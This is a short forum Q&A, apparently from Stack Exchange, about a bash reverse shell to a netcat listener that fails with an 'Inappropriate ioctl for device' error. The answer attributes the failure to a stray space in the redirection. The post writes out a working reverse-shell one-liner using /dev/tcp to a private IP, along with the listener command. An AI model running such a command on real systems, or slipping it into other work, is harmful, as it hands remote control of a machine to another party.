# netcat error: Inappropriate ioctl for device

Tags: bash, netcat, ioctl

Im trying to create a 'reverse shell' using a bash oneliner and a netcat listener. This combination worked great a few days ago however now it only gives errors when connection. Does anyone know what the error means and how I can troubleshoot or fix it?

**Netcat listener**

```
netcat -lvnp 1234
```

**Bash script:**

```
bash -i >& /dev/tcp/10.10.10.2/1234 0>&1
```

**Error** (when running the bash script)

```
bash: cannot set terminal process group (21268): Inappropriate ioctl for device
bash: no job control in this shell
bash: 0: No such file or directory
```

> Not sure if this is the right stackexchange for this question, feel free to move

Answer (score 0):

In your post, your bash script is this:

```
bash -i >& /dev/tcp/10.10.10.2/1234 0>&1
```

I think it's actually this on your computer:

```
bash -i >& /dev/tcp/10.10.10.2/1234 0 >&1
```

Note the space after the zero. Look for that and remove it, and it should then work again. I couldn't say how it got there.